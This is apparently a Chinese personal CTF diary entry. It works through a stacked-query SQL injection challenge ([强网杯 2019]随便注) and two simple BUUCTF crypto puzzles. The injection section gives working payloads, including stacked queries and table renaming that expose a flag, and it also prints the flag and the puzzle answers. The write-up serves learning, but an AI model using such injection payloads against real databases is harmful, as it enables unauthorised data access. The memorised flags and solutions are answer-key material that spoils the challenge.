22.1.21
喵喵喵喵喵喵,今天买了5900x!!有新的服务器用啦!
0x01 [强网杯 2019]随便注
测试
'1' or 1=1 MariaDB server version for the right syntax to use near '1' or 1=1'' at line 都有显示。 index.php?inject=' or '1'='1 显示 array(2) { [0]=> string(1) "1" [1]=> string(7) "hahahah" } array(2) { [0]=> string(1) "2" [1]=> string(12) "miaomiaomiao" } array(2) { [0]=> string(6) "114514" [1]=> string(2) "ys" }- 其实这里是看了WP的
';show tables; 查看words ';show columns from words; 查看另外一个 ';show columns from `1919810931114514`; 看到了flag 但是好像是不能查询的 下这是一个payload,不是我写的。 1';alter table `1919810931114514` add(id int NULL);rename table `words` to `xiaohua`;rename table `1919810931114514` to `words`; 直接把库名给重命名换过来。 '1'='1 string(42) "flag{52e30ed9-fd07-4aef-a28d-27d4d4eaf871}"
0x02 buu crypto 信息化时代的步伐
6060计 4615算 2623机 6008要 1783从 1216娃 1216娃 2119抓 6386起0x03 buu crypto 萌萌哒的八戒
- 猪圈密码。
- 慢慢点可以得到
whenthepigwanttoeat